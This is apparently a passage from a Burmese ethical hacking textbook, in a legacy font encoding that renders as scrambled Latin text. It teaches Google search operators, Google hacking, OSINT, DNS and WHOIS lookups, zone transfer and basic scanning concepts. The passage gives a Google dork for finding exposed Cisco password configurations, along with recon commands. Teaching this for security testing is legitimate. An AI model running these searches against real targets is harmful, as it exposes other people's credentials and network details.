'gaMumifh Search toHk;jyKjcif;[m uRefawmfwdkY tm;vHk;eJY rpdrf;Muygbl;/
xdkYtwlyJ Facebook rSmwifomru tifwmeufrSm &Sd&SdorSsxJu &SmazGcsif&ifawmh
Google, Yahoo, Bing pwJh Search Engine awGudk toHk;jyKMuavh&Sdygw,f/
Google uawmh toHk;trsm;qHk; Search Engine wpfrsdK;ygyJ/ uRefawmfwdkYvnf;
Google search udk oHk;zl;Muygw,f/ ck azmfjyr,fh Searching udkawmh
vltenf;i,fu omvsif toHk;jyKMuwmyg/ bmawGuGmvJ Munfh&atmif/
yxrqHk;taeeJY uRefawmfwdkY&JU browser rSm 'Dvdyfpmav; &dkufxnfh
&ygr,f/ www.google.com/advanced_search yg/ txufygtwdkif;
&dkufxnfhvdkufr,fqdk&ifawmh ckvdkrsdK; ay:vmygr,f/
 yHkt& jrifuGif;u ao;aeygw,f/ 'gaMumifh aocsmjrifEdkifzdkYtwGufawmh
rdrdwdkY uGefysLwm&JU Browser (Firefox or Chrome) uae 0ifa&mufMunfhyg/
'Dae&mrSmawmh wpfydkif;csif;pDudk acgif;pOfwpfckpDtaeeJY azmfjyay;oGm;ygr,f/

yxrqHk; box u All These Words yg/ 'D field udk rdrd&SmazGvdkwJh t"du
pum;vHk;awGtwGuf toHk;jyKygw,f/ Oyrm - rdrdu Ethical Hacking vdkY
a&;vdkufr,f qdkygpdkY/ Ethical Hacking vdkY tpOfvdkufjzpfap? ethical wpfae&m
hacking wpfae&mjzpfap web page &JU rnfonfhtpdwftydkif;rSmrqdk awGYwmudk
azmfjyay;rSmjzpfygw,f/ wpfenf;ajym&&if 'g[m uRefawmfwdkY yHkrSef &Smaeus
twdkif;ygyJ/

'kwd, field uawmh exact word or phrase vdkY qdkwJhtwdkif;

uRefawmfwdkY &dkufxnfhr,fh pum;vHk;twdkif; twdtus yg0ifwmudkom &Smr,f
qdkwJh oabmyg/ qdkvdkwmu tJonfae&mrSm uRefawmfwdkYu Ethical hacking vdkY
xnfhvdkuf&if Ethical hacking vdkY tpOfvdkuf pum;vHk;udk rawGYbJ result
xkwfjyrSmr[kwfygbl;/ yHkrSef search rSm olYudk oHk;csif&if
rsufawmiftzGifhtydwfMum; xnfhoHk;&ygw,f/ Oyrm "ethical hacking" aygh/

wwd, field uawmh any of these words vdkY qdkwJhtwGuf uRefawmfwdkY

&SmazGr,fh pum;vHk; twGJvdkufr[kwfbJ wpfvHk;pD yg0ifae&ifvnf;
jyay;rSmjzpfygw,f/ uRefawmfwdkYu tJonfae&mrSm Ethical Hacking vdkY &Sm&if
Ethical odkYr[kwf Hacking wpfckck ygwmeJY xkwfjyrSmjzpfygw,f/ yHkrSef Search rSm
olYudk toHk;jyKcsif&ifawmh OR eJY qufjyD; oHk;Edkifygw,f/ (ethical OR hacking)

'D field uawmh none of these words udk,f razmfjyapcsifwJh pum;vHk;

wpfenf;tm;jzifh rygapcsifwJh pum;vHk;udk xnfhzdkY jzpfygw,f/ yHkrSef search rSm
olYudk toHk;jyKcsif&if minus sign udk xnfhoHk;Edkifygw,f/ Oyrm - John udk
rygapcsifbl;&if -John aygh/

'Dtydkif;udkawmh unit ygwJh udef;awGudkvnf; toHk;jyKEdkifygw,f/ Oyrm

20$ to 50$ qdkwmrsdK;? 20miles to 50 miles qdkwmrsdK;awGaygh/ yHkrSef search box
rSmvnf; toHk;jyKEdkifygw,f/ Oyrm 20$ 50$ yHkpHeJY xnfhoGif;Edkifygw,f/

'Dtydkif;awGudkawmh &Sif;jyp&mvdkr,frxifawmhyg/ last updated

qdkwmu udk,f&Smr,fh taMumif;t&monf b,fcsdefu
aemufqHk;wifcJhwmvJqdkwm a&G;cs,fzdkYyg/ Oyrm ajym&&if enf;vrf;wpfck
&SmMunfhw,f qdkygpdkY/ xGufvmwJh result awGu 2000 avmufu wifxm;wmawG
jzpfcsifjzpfr,f/ 2010 avmufrSm wifxm;wmawGvnf; jzpfEdkifygw,f/
udk,fodcsifwmu update udk qdk&if teD;pyfqHk;udk a&G;&r,faygh/

txufygyHktwdkif;ygyJ/ 24em&DtwGif;? wpfywftwGif;? wpfvtwGif;?

wpfESpftwGif; wifcJhwmudk &SmazGr,fqdkjyD; a&G;cs,fEdkifygw,f/

&SmazGwJhtcg result awG odyfrsm;aerSmpdk;&if site or domain uae

uefYowfEdkifygao;w,f/ Oyrm wikipedia.org ponfjzifhaygh/ yHkrSef search
jyKvkyfwJh ae&mrSm 'D function udk toHk;jyKvdkygu site: qdkwmudk
a&G;cs,fEdkifygao;w,f/ Oyrm - site:wikipedia.org ponfjzifhaygh/

aemufwpfcku terms appearing yg/ tJonfrSm a&G;cs,fp&mawG xJu

yxrwpfcku "anywhere in the page" yg/ yHkrSef&SmazGovdkyJ &SmazGwJhtaMumif;
t&m b,fae&mrSmygyg result vmay:jyrSm jzpfygw,f/ aemufwpfck "in the title
of the page" uawmh uRefawmfwdkY &SmazGr,fh taMumif;t&monf title ae&mrSm
&SdaewmawGudkyJ xkwfjyyg vdkY qdkvdkwmjzpfygw,f/ yHkrSef search rSm
&SmazGtoHk;jyKvdkygu intitle: udk toHk;jyK&SmazGEdkifygw,f/ Oyrm -
intitle:hacking , intitle:"ethical hacking" /
aemufxyf "in the text of the page" qdkwmuawmh uRefawmfwdkY
&SmazGvdkwJh tcsuftvufonf acgif;pOfrSmxuf pmudk,frSm ygwmrsdK;udk
&SmazGwmudk qdkvdkygw,f/ yHkrSef &SmazGwJhae&mrSm olYudk xnfhoHk;csif&ifawmh intext:
udk toHk;jyKEdkifygw,f/ Oyrm - intext:hacking aygh/
aemufwpfcku "in the URL of the page" jzpfygw,f/ URL xJrSm
&SmazGwmjzpfjyD; inurl: udk toHk;jyKEdkifygw,f/ Oyrm url rSm mm yg0ifwmudk
&SmazGcsif&ifawmh inurl:mm udk toHk;jyK &SmazGEdkifygw,f/ aemufqHk;wpfckjzpfwJh in
links to the page udkawmh odyfroHk;Muygbl;/ inlink:example.com eJY
&SmazGEdkifygw,f/

Safe Search rSmawmh options ESpfck &SdjyD; show most relevant results u
yHkrSeftwdkif;jzpfjyD; filter explicit uawmh sexually explicit video awGeJY image
awGudk search result rSm a&mufrvmatmif filter vkyfay;ygw,f/
 aemufxyf option wpfckjzpfwJh File Type uawmh &Sif;rjyawmhbl;aemf/
udk,f&SmazGvdkwJh zdkiftrsdK;tpm;tvdkuf a&G;p&mawG ay;xm;ygw,f/ yHkrSef search
rSm file type udk xnfh&Smcsifw,fqdk&ifawmh (Oyrm - pdf udk &Smr,fqdkygu)
filetype:pdf qdkjyD; xnfh&SmEdkifygw,f/

aemufqHk; function jzpfwJh usage rights uvnf; toHk;enf;ygw,f/

default twdkif;om &SmMuavh&SdvdkY tJ'Dtydkif; xnfhrajymawmhbl;aemf/

Google Hacking & Google Hacking Database

'Dacgif;pOfav;udkawmh tm;vHk; odMu &if;ESD;Muvdrfhr,fvdkY ,lqygw,f/
Johnny Long u pwifwDxGifcJhjyD; Google operators & terms awGudk Google
Search engine eJY aygif;pyfjyD; tvGefwefzdk;&SdwJh tcsuftvufawGudk tifwmeuf
rS wpfqifh &&SdEdkifapzdkY zefwD;xm;wJh enf;ynmwpfck jzpfygw,f/ People &
organizations awG&JUtaMumif; information awGudk &,lEdkifapzdkY Google database
udk query vkyfEdkifzdkYtwGuf targeted expression awGudk twdtus toHk;jyKEdkifrI
ay: focus xm;wJh enf;ynmvdkY tBurf;zsif; ajymEdkifygw,f/
Google hacking eJY ywfoufjyD; enf;ynmpmtkyfaygif; rsm;pGm xGuf&Sd
xm;ovdk johnny Long udk,fwdkifa&;wJh Google Hacking for Penetration Testers
qdkwJh pmtkyfu tausmfMum;qHk;jzpfygw,f/ www.khitminnyo.com rSm ebook
uae oGm;a&muf zwf&IEdkifygw,f/
Google Hacking Database (GHDB) rSm Google Hacking search
query string rsm;pGmudk compile vkyfay;xm;jyD; rlv database uawmh
www.hackersforcharity.org/ghdb rSm jzpfygw,f/ Kali &JU rdcif Offensive
Security rSmvnf;yJ GHDB udk azmfjyxm;wm &SdjyD;
www.offensive-security.com/community-projects/google-hacking-database/
rSm Munfh&IEdkifygw,f/ Offensive Security uae pkpnf;xdef;odrf;xm;ay;wJh
www.exploit-db.com/google-hacking-database rSmawmh Google hacks
category 14 cktjzpf jyefvnf cGJjcm; odrf;qnf;xm;ygw,f/

xdk category 14 ckxJrSm Files Containing Passwords qdkwJh

Category wpfck yg0ifjyD; search strings aygif; 160 ausmf yg&Sdygw,f/ xdkxJurS
example taeeJY Cisco passwords awGudk &SmazG&mrSm toHk;jyKEdkifwJh search
string wpfckudk erlem azmfjyay;ygr,f/

rdrdwdkYbmom Google Search rSm vufawGY &SmazGMunfhEdkifygw,f/

enable password | secret "current configuration" -intext:the udk oHk;jyD;
&SmazGwJhtcg Search result aygif; 6aomif;cGJ cefY xGufvmwm awGY&rSmjzpfjyD;
tcsdKuzdkifawGrSmawmh Password ygrvmwmrsdK;awmh tenf;i,f &SdEdkifygw,f/
olYudk site: vdk tjcm;aom operator awGeJYvnf; aygif;pyf toHk;jyKEdkifygw,f/

Social Media
'Dacgif;pOfav; awGYvdkufwmeJYwif uRefawmfwdkY tm&HkrSm bmudk
jrifa,mifrdygovJ/ Facebook udk jrifa,mifrdol trsm;qHk;jzpfMur,fvdkY ,HkMunfrd
ygw,f/ Social Media awG[m ,aeYacwfrSm vlawG&JU aeYpOfb0rSm
wpfpdwfwpfydkif;u yg0ifaeygw,f/ uRefawmfwdkY EdkifiHrSmawmh Facebook &
Instagram oHk;ol trsm;qHk;jzpfjyD; Twitter eJY Linked In oHk;ol tawmf
enf;ygao;w,f/ Fb vdk social media profile uae tcsdKUaom tcsufftvufawG
&,lEdkifovdk rdrdwdkY Target &JU 0goemudk cefYrSef;yHkazmfEdkifygw,f/
LinkedIn uawmh uRefawmfwdkYqDrSm oHk;ol enf;ao;ayr,fh
Organizational chart awG? email awGtjyif tjcm; Sensitive Information (e.g.
JD) awGudkyg &&SdEdkifwJh Social media wpfck jzpfygw,f/ txufyg Social Media
awG &Sdaejcif;uvnf; hacker awGtwGuf Social Engineering udk toHk;jyKzdkY
tcGifhtvrf;awG ydkrdkvmapygw,f/

DNS and DNS Attacks

DNS qdkwm Domain Name System/Service wdkYudk &nfnTef;w,fqdkwm
awmh tm;vHk;eD;yg; odMujyD;jzpfygw,f/ Google udk google.com vdkY rSwf&wmu
173.194.46.19 vdkY rSwf&wmxuf ydkrdkvG,fuljyD; rSwfrdEdkifwmaMumifh
uRefawmfwdkYawGu DNS udk toHk;jyKMuw,fqdkwmudkvnf; tm;vHk; od&SdjyD;
jzpfygw,f/ uRefawmfwdkY vlom;awGu name awGudkom rSwfrdvG,fayr,fh
uGefysLwmawG (tjcm;pufawG) uawmh udef;awGudkyJ rSwfrdMuygw,f/ 'Dawmh
vlom;awG em;vnfwJh google.com/facebook.com pwmawGudk pufu
em;vnfwJh 192.168.0.1 pwJh IP address awG jzpfatmif ajymif;vJ jyefqdkay;wJh
pepfudk DNS vdkY rSwfom;Edkifygw,f/ tJvdk bmomjyefqdkay;wJhwm0efudk Name
server u ,lygw,f/
name server rSm tvGef toHk;0ifwJh tcsuftvufawG &Sdaeygw,f/
Oyrm ajym&&if name server rSm mail server, MX record, domain pwJh
information awG yg0ifygw,f/ Kali Linux &JU nslookup av;taMumif;
qufvuf aqG;aEG;&atmi/ Terminal udk zGifhvdkufyg/
 Terminal rSm nslookup udk enter vdkufygu ">" oauFwav;
ay:vmygr,f/ Greater than oauFw jzpfayr,fh olYudk carrot vdkY ac:ygw,f/ 'D
carrot av;rSm rdrdwkdY pHkprf;od&SdvdkwJh domain av;awGudk xnfhoGif;Edkifygw,f/
carrot (>) av;xJuae Terminal qD jyefxGufvdkygu exit vdkY &dkufjyD;
xGufEdkifygw,f/

nslookup xJ jyef0ifMunfh&atmif/ Terminal rSm nslookup vdkY &dkufjyD;

enter vdkufyg/

jyD;&if target web page &JU IP address udk od&SdapEdkifzdkYtwGuf target

web page &JU domain udk &dkufxnfhyg/ uRefawmfu www.google.com udk erlem
jyygr,f/

authoritative eJY non-authoritative qdkjyD; ESpfrsdK; azmfjywmudk

awGY&ygr,f/ Non-authoritative answer onf server's cache awG&JU information
awGudk nTefjyEdkifwmjzpfvdkY odyfaumif;wJh information source vdkY qdkEdkifygw,f/
jyefrxGufao;bJ aemufxyf xyfquf&SmMunfh&atmifAs/
>set type=MX
>google.com
 Google.com twGuf Mail server awGudk awGYjrif&jyDaemf/

set type=ns owfrSwfay;jyD; Google.com udk jyef&dkufvdkufwJhtcg

google &JU name server (ns) awGudk awGYjrifvm&jyD jzpfygw,f/

Zone Transfer
nslookup vdk Program rsdK;udk toHk;jyKjyD; information tawmfrsm;rsm;udk
pkaqmif;&&SdEdkifovdk Zone transfer ukd oHk;jyD;vnf; information tawmfrsm;rsm;udk
pkaqmif;Edkifygao;w,f/ toHk;jyKwJh command yHkpHuawmh dig @[name server]
[domain] axfr jzpfygw,f/

[name server] ae&mrSm nslookup eJY &SmcJhwJh result u name server udk
xnfhoGif;Edkifygw,f/ [domain] uvnf; odjyD;om; jzpfwmrdkY tay: yHkav;rSm
Munfh&if erlemjyxm;wmudk awGYjrifEdkifygw,f/
Information Gathering Tools in Kali Linux

Information Gathering eJY ywfoufjyD; Kali Linux rSm build-in tools

awG rsm;pGm &SdMuygw,f/ DNS Analysis, IDS/IPS Identification, Live Host
Identification, Network & Port Scanner, OSINT Analysis, Route Analysis,
SMB Analysis, SMTP Analysis, SNMP Analysis eJY SSL Analysis qdkjyD;
cGJjcm;xm;wJh tool group q,fck&Sdygw,f/ Group wpfckcsif;pDtvdkuf tool awG
xyf&SdwmaMumifh 01-Information Gathering qdkwJh xJrSm tool aygif; rsm;pGmudk
jrifawGY&rSmyg/ aemufydkif;rSm oufqdkif&m u@tvdkuf tvsOf;oifhovdk
azmfjyay;oGm;ygr,f/

Seven Steps of Information Gathering

Reconnaissance qdkwm Information Gathering vkyfwJh
vkyfief;pOftm;vHk;aygif;udk qdkvdkw,fvdkY a&SUrSmaqG;aEG;cJhjyD;jyDaemf/ Information
Gathering vkyfaqmif&mrSm Active vnf; jzpfEdkifovdk Passive vnf;
jzpfEdkifygw,f/ Hacker wpfa,mufu Active a&m Passive a&myg ESpfrsdK;vHk;
toHk;jyKjyD;vnf; information awGudk gather vkyfEdkifzdkY BudK;pm;Edkifygao;w,f/
Public Website vdk ae&mawGuae &SmazGjcif;tygt0if Information gathering
udk t"dutm;jzifh Steps 7ckeJY cGJjcm;Edkifygw,f/

Active footprinting, Passive footprinting & Enumeration qdkwJh

tqifh oHk;ckudk jyefcGJMunfhwJhtcg txufygtwdkif; Seven steps of information
gathering udk &&Sdygw,f/ 'D7qifh rSefayr,fh 'Dtwdkif; tpOfvdkufyJ
vkyf&r,fvdkYawmh vHk;0 rqdkvdkyg/ wpfqifhcsif;pDtaMumif; tao;pdwf
aqmif;yg;rsm;udk www.khitminnyo.com wGif qufvuf
a&;om;ay;oGm;ygrnf/ ,ckpmtkyfwGif xdktqifhrsm;udk azmfjyaeygu
pmrsufESmrsm;pGm ukefoGm;rSmjzpfvdkY wpfckpD &Sif;rjyawmhyg/
uRefawmfwdkY apmapmu aqG;aEG;cJhwJhtwdkif;ygyJ/ Attacker wpfa,muf
u information awGudk pkaqmif;wJhtcg Active & Passive footprinting ESpfrsdK;vHk;
toHk;jyKEdkifygw,f/ aumif;jyD 'gqdk b,fuprvJ/ taumif;qHk; pwifrIuawmh
target company &JU website udk 0ifa&muf Munfh&Ijcif;ygyJ/ Target organization
taMumif; em;vnfvmr,f/ target organization &JU Key People awG? contact
details (name, mail, phone, etc...)? target company &JU potential customers awG?
business area eJY olwdkY toHk;jyKwJh enf;ynm pwmawGudk od&SdEdkifygw,f/ Public
wifxm;wJh web uae &,lwmjzpfvdkY w&m;0if information &,ljcif;jzpfygw,f/
xdkodkY target udk wdkuf&dkuf xdawGYjcif;r&Sdao;bJ information
&,ljcif;rsdK;udk Passive Footprinting vdkY tMurf;zsif; rSwf,lEdkifygw,f/ tJonfrSm
odvmr,fh contact phone udk qufjyD; jzpfap? mail uaejzpfap? Social Media
awGuaejzpfap information awG ydk&zdkYtwGuf BudK;pm;jcif;uawmh Active
footprinting xJrSm yg0ifygw,f/
WHOIS
uRefawmfwdkYtaeeJY website wpfck&JU information awGudk pkaqmif;wJh
ae&mrSm tulnDay;Edkifr,fh aemufxyf tool av;wpfck &Sdygao;w,f/ WHOIS
yg/ Kali Linux &JU Terminal uae vG,fulpGm toHk;jyKEdkifygw,f/
www.bible-history.com udk erlemtaeeJY &Smjyyghr,f/ &SmwJhtcg www. udk
rxnfhoGif;&yg/

erlem &Smjyxm;ovdkygyJ/ rdrdwdkY&JU Target domain udk

xnfhoGif;&SmazGwJhtcg tvGef wefzdk;&SdwJh tcsuftvufawGudk
&&SdvmrSmjzpfygw,f/ txufyg yHkrSmvnf; jrifawGY&Edkifovdk yHkrSm
rygwJhtydkif;awGudkvnf; jrifawGY&ygvdrfhr,f/
txufyg result udk tjcm; device (e.g. phone) awGuae
&Smcsifygvsifawmh Browser rSm sg.godaddy.com/whois vdkY &dkufxnfhjyD;
oGm;a&muf&SmazGEdkifygw,f/

ay:vmwJh search box rSm target domain udk xnfhoGif;&Smvdkuf&if

&ygjyD/
jyefquf&atmif/ Kali terminal rSm target domain eJYywfufjyD; cke
&SmwJhae&mrSmyJ host target yHkpHeJY toHk;jyKEdkifygao;w,f/ cke bible-history.com
udkyJ qufjyD;erlem jyyghr,f/
 vuf&Sd target twGuf mail udk b,fu handle vkyfay;aevJqdkwm
jrifEdkifygw,f/ target &JU name server awGudk odcsif&ifawmh host -t ns
target-domain yHkpHeJY &SmazG&rSm jzpfygw,f/ Oyrm-

txufygtwdkif; &SmazGwJhtcg target &JU name server udk &&SdrSmjzpfjyD;

host -l target-domain ns yHkpHeJY Target IP &atmif qufvuf pHkprf;Edkifygw,f/

txufygyHkrSmMunfhyg/ ydk&Sif;atmif ,lxnfhxm;wJh ns udk jyay;xm;

ygw,f/ IP &vmygjyD/ &vmwJh IP udk Detail information &atmif qufvuf
pHkprf;EdkifzdkY whois IP udk toHk;jyKEdkifygw,f/

wu,fwrf; Reconnaissance, Footprinting, Information Gathering

awGudk tjynfhtpHk &Sif;vif;azmfjyzdkYqdk&if pmrsufESm 200 cefYeD;yg &SdoGm;Edkifygw,f/
'DpmtkyfxJrSmawmh 'Dae&mrSmyJ tawmfvHkavmufaejyDvdkY ,lqwmaMumifh cP
ydkif;vdkuf&atmifAsm/ a&SU Chapter av;rSm pmzwfolawGeJY jyefqHkMuwmaygh/ :)
CHAPTER 9: Scanning

Introduction

Chapter 6 rSmwkef;u Hacker awGtaeeJY jyKvkyfavh&SdwJh steps

awGxJurS Ethical Hacker awGtwGuf 5 steps qdkjyD; aqG;aEG;xm;wmav;
rSwfrdOD;r,fxifygw,f/ yxrqHk;tqifh Reconnaissance udkvnf; Chapter 7 rSm
aqG;aEG;cJhjyDrdkY 'kwd,tqifh Scanning udk qufjyD; aqG;aEG;oGm;ygr,f/ yxrqHk;
tqifhjzpfwJh Reconnaissance phase rSm jynfhpHkvHkavmufwJh Information awGudk
active & passive footprinting enf;vrf;awGeJY &,ljyD;wJhtcg 'kwd,ajrmuf
vkyfaqmif&r,fh Phase u Scanning jzpfygw,f/
Scanning udk t"dutm;jzifh network scanning eJY port scanning qdkjyD;
tydkif;ESpfydkif;tjzpf &IjrifEdkifygw,f/ aqG;aEG;&if;eJY ydkjyD; em;vnfvmygvdrfhr,f/
Scanning phase twGuf tajctaeuawmh Information Gathering
vkyfcJhEdkifrIay: rlwnfjyD; uGmjcm;Edkifygw,f/ qdkvdkwmu a&SUtqifhrSm information
tjynfhtpHk pkaqmif;cJhEdkif&if 'DtqifhrSm ydkjyD; vG,fulr,fvdkY qkdvdkwmyg/
Scanning Phase &JU t"du Focus uawmh target organization &JU
Network eJY csdwfqufxm;wJh computers & deices awGeJY ywfoufjyD; specific
information awGudk &SmazG aumufcsufqGJEdkifzdkY jzpfygw,f/ 'D Phase rSmu
t"dutm;jzifh target organization &JU network twGif;rSm&SdaewJh system awGrSm
live host awGudk &SmazGzdkY? trsdK;tpm; cGJjcm;EdkifzdkY (e.g. desktop, laptop, server,
network device, or mobile computing devices, etc)? b,f Operating System
udk toHk;jyKxm;vJ? b,fvdk Public service awG ay;xm;vJ (e.g. web applications,
SMTP, FTP, etc...) b,fvdk vulnerability awG &SdaeEdkifrvJ ponfjzifh
aumufcsufqGJEdkifzdkYudk t"du focus xm;ygw,f/
xdkodkY Scanning jyKvkyfEdkifzdkYtwGufawmh Nessus, Nmap, Hping
pwmawGudk toHk;jyKEdkifygw,f/ 'Dtqifh&JU &nf&G,fcsufuawmh aemufwpfqifh rSm
rwdkufcdkufrD possible target lists jyKvkyfxm;EdkifzdkY jzpfygw,f/

Definition (Vocabulary)
'Dtcef;rSm yg0ifr,fh terms tcsdKUeJY ywfoufjyD; BudKwif azmfjy
xm;csifwmav;awGudk pkpnf;vdkufwmyg/ rodao;wJholawGtwGuf tqifajyap
zdkY jzpfygw,f/ wpfckcsif;pDyJ t&if MunfhoGm;&atmif/
Network Traffic
enf;vrf;rsdK;pHkeJY csdwfqufqufoG,fxm;wJh uGefysLwmpepfawGMum;u
electronic communication udk network traffic vdkY owfrSwfac:qdkEdkifygw,f/

Firewalls
network system wpfckudk umuG,fzdkYtwGuf toHk;jyKwJht&mvdkY
vlodrsm;wJh firewall &JU rlv t"dyÜg,fu rD;cHeH&H^rD;umeH&H jzpfygw,f/ computing
e,fy,frSmawmh firewall u network twGuf *dwfapmifh wpfOD;taeeJY vkyfaqmif
ay;ygw,f/ *dwfapmifh qdkwJhtwdkif; t0iftxGuf apmifhMunfhr,f/ access control
uae csrSwfxm;wJh criteria eJY udkufnDrI&SdwJh traffic udkom jzwfoef;cGifhjyKrSmjzpfjyD;
udkufnDrI r&SdwmawGudkawmh ydwfxm;rSmjzpfygw,f/ 'gaMumifh firewall [m
inbound traffic (ingress) eJY outbound traffic (egress) wdkYudk pdppfí vufcHjcif;
jiif;y,fjcif; pwmawG vkyfaqmifzdkYtwGuf port awGudk zGifh^ydwf vkyfEdkifygw,f/

Ports
Port qdkwmuawmh computer to computer communication twGuf
toHk;jyKwJh communication channel awGudk qdkvdkygw,f/ communication
twGuf toHk;jyKEdkifwJh TCP port 65,535 ports &SdjyD; UDP port aygif;uvnf;
63,535 ports &Sdygw,f/ port awG trsm;BuD; &Sdwmayr,fh wu,fwrf; wduswJh
vkyfaqmifcsuftwGuf owfrSwfvkyfaqmifEdkifwJh port tenf;i,fom &Sdygw,f/
olwdkYudkvnf; 'gtwGufyJvdkY uefYowfxm;wmawmh r[kwfygbl;/ Oyrm &Sif;jy&&if
TCP port 80 udk HTTP (Hyper Text Transfer Protocol) ESifhtwl normal web
traffic utilizing twGuf toHk;jyKavh&Sdayr,fh tjcm;aom traffic awGuvnf;yJ
port 80 udk jzwfoef;oGm;Edkifygw,f/
Port eJY ywfoufjyD; ydkem;vnfatmif ajym&&if BuD;rm;jyD;
tcef;aygif;rsm;pGm yg0ifwJh &Hk; taqmuftOD;BuD;wpfckudk jrifa,mifMunfhyg/
tcef;wdkif; tcef;wdkif;rSm wHcg;awG &SdMuovdk rwlnDwJh function awGudk
vkyfaqmif&wJh 0efxrf;awGvnf; tcef;wdkif;rSm &SdaeMuygw,f/ xdk&Hk;rSm web eJY
ywfoufwJht&mwdkif;udk suit 80 u udkifwG,fvkyfaqmifw,f qdkygpdkY/ tqdkyg suit
80 u tjcm;&Hk; wpf&Hk;odkY ajymif;a&TUoGm;onfjzpfap? wm0efajymif;vJoGm;onf
jzpfapaygh/ olY&JU rlvvkyfief;awGudk tjcm;wpfXmerSm vTJajymif;ay;tyfcJh&rSm
jzpfygw,f/ olY&JU hand over udk suit 8080 udk vTJtyfcJhw,f qdkygpdkY/ 8080 onf ol
vTJajymif;&,lvdkufwJh web ydkif;qdkif&mawGudk wm0ef,l vkyfaqmif&awmhrSmjzpf
ygw,f/
'DtajctaerSm 80 xH vma&mufolawG[m ydwfxm;wJh tcef; or
toHk;rjyKwJh tcef;tjzpfom jrifawGY&rSmjzpfjyD; web ydkif;qdkif&mudk qufvuf pHkprf;
Munfhr,fqdk&ifawmh 8080 rSm &&SdEdkifwmudk od&rSm jzpfovdk 80 rSm r&Edkifawmhbl;
qdkwmudkyg od&SdoGm;rSm jzpfygw,f/ 'gaMumifh 8080 eJY rSefuefwJh vdyfpmudk &&Sd
xm;olawGu web request xH rSefuefpGm a&muf&SdoGm;Edkifayr,fh 80 udkom
od&Sdxm;olawGtwGufawmh rSm;,Gif;wJh qufoG,frIaMumifh tcsdefydkMumjyD; tcuf
tcJawGudk &ifqdkif&Edkifygw,f/ 'gu jrifomatmif Oyrm av; azmfjyay;jcif;yg/

IP Protocols
Protocols qdkwm uGefysLwme,fy,frSma&m wu,fh real life rSma&m
rules udk udk,fpm;jyKygw,f/ oHwrefawG? EdkifiHa&;orm;awGeJY high-level office
awGrSm protocol issue udk udkifwG,fajz&Sif;zdkY txl;0efxrf;awG cefYxm;wwfMu
ygw,f/ message awGudk oifhawmf rSefuefpGm ay;ydkY vufcHEdkif&JUvm;? &mxl;
tqifhtvdkuf od&r,fht&mawGa&m rSefuef&JUvm; ponfudk protocol issue
twGuf cefYtyfxm;wJh tJonf 0efxrf;awGuyJ wm0ef,l BuD;Muyf&ygw,f/
uGefysLwme,fy,frSmvnf; xdkYtwlygyJ/ system awG Mum;rSm BudKwifowfrSwfxm;
wJh rules awGtwdkif; jzpfzdkY vkyfaqmif&ygw,f/

TCP
TCP qdkwmu Network communication twGuf toHk;jyKwJh main
protocol awGxJu wpfck jzpfygw,f/ connection-based communication
protocol wpfckjzpfvdkY communication channel wpfbufpDrSm &SdaeMuwJh
uGefysLwmawG&JU qufoG,frI session awGudk zGifhjyD; tcsuftvufawG ay;ydkY
vufcHEdkifzdkY pwmawGtwGuf toHk;jyKEdkifygw,f/
zkef;ajymwJh Oyrmav;eJY quf&atmif/ zkef;jrnfoHwpfck Mum;&jyD qdkygpdkY/
Mg Mg: "hello"
Caller: "Hi, udk armifarmif &Sdygovm;cifAsm/ udkarmifarmifeJY
pum;ajymcsifvdkYyg"
Mg Mg: " ckpum;ajymaewm armifarmifygAs"
txufyg zkef;ajymjcif; Oyrmudk Munfh&if TCP &JU Three ways
hand-shake eJY qifwlwmudk awGY&ygr,f/ TCP communication rSm uGefysLwm
wpfvHk;eJYwpfvHk; csdwfqufpOf yxrqHk; communication pwifpOfrSm packet
exchange oHk;ck jzpfay:ygw,f/
 yxrqHk;taeeJY PC-A u PC-B xH reliable connection wpfck
wnfaqmufvdkaMumif; SYN packet awG ay;ydkYtaMumif;Mum;ygw,f/ PC-B
uvnf; PC-A xH acknowledgment & synchronization ESpfckvHk; xnfhoGif;jyD;
(SYN/ACK) response jyefygw,f/ acknowledgment &JU &nf&G,fcsufu source
u ay;ydkYwJh SYN packet udk vufcH &&SdwJhtaMumif;? connection wnfaqmufzdkY
twGuf destination &JU SYN flag udk vufcHaMumif; jyefMum;zdkYtwGuf jzpfygw,f/
xdk TCP packet udkawmh SYN/ACK vdkY ac:qdkoHk;EIef;ygw,f/ wwd,taeeJY
PC-A u SYN/ACK udk vufcH&&SdwJhtcg ACK flag udk TCP header xJrSm
xnfhoGif;jyD; ACK packet udk ay;ydkY taMumif;jyeftjyD;rSmawmh connection wpfck
wnfaqmufjyD; jzpfjyDrdkY qufoG,fvdkY &jyD jzpfygw,f/

UDP
'D UDP uawmh TCP vdk reliable rjzpfwJh connection protocol
wpfrsdK;yg/ tao;pdwfawmh razmfjyawmhyg/

ICMP & Ping

'DESpfckudkawmh acgif;pOf cGJrajymawmhbl;aemf/ TCP/IP device
ESpfckMum;rSm rSefuefpGm csdwfqufEdkifjcif; &Sd r&Sd? error &Sd r&SdeJY control information
awGudk ay;ydkYEdkifapzdkYtwGuf ICMP udk toHk;jyKygw,f/ ICMP message awG[m
olwdkY&JU header xJrSm specific type and code (number set) awG &SdMuygw,f/
network rSm&SdaewJh node trsdK;rsdK;eJY ywfoufwJh information awGudk axmufyHhay;
wmaMumifh tJonf type of code awG[m target system rSm b,f system awG
running vkyfaew,fqdkwmudk cefYrSef;EdkifapzdkY pen-tester awGudk ulnDay;ovdk
&Sdaeygw,f/
 Fig: ICMP table
tJonfrSm ICMP message awGjzpfwJh echo, echo request, destination
unreachable eJY tjcm; message tcsdKUudk toHk;jyKwJh application wpfck &Sdygw,f/
tJ'guawmh ping ygyJ/ destination wpfck available jzpf rjzpf ppfaq;EdkifzdkY&m
twGuf ping udk toHk;jyKEdkifygw,f/ destination onf available jzpfygu echo
reply packet eJY wkefYjyefvmrSmjzpfjyD; Intermediate router onf destination xH
a&mufatmif roGm;Edkifygu destination unreachable message eJY wkefYjyefygr,f/
router u destination udkawmh a&mufjyD; echo packet udk rwkefYjyefygu request
timed out message udkom awGY&ygvdrfhr,f/

txufyg yHkrSm erlemtaeeJY Ping 192.168.1.1 udk erlem jyxm;ygw,f/

Windows cmd uae ping wJhtcgrSm olYbmom jyD;qHk;jyD; &yfoGm;rSmayr,fh Linux
terminal uae ping r,fqdk&ifawmh control + c udk rESdyfrcsif; qufvuf run
aeygvdrfhr,f/

erlem vkyfMunfhaygh/
Traceroute
destination qDodkY oGm;a&mufvm vrf;wpfavQmuf&Sd routers' IP address
awGudk list vkyfay;wJh tool wpfcku traceroute yg/ traceroute pm ICMP's Ping
command udk toHk;jyKygw,f/ windows rSm oHk;wJh Traceroute command u
tracert jzpfygw,f/

Windows cmd rSm erlem jyxm;wm jzpfygw,f/

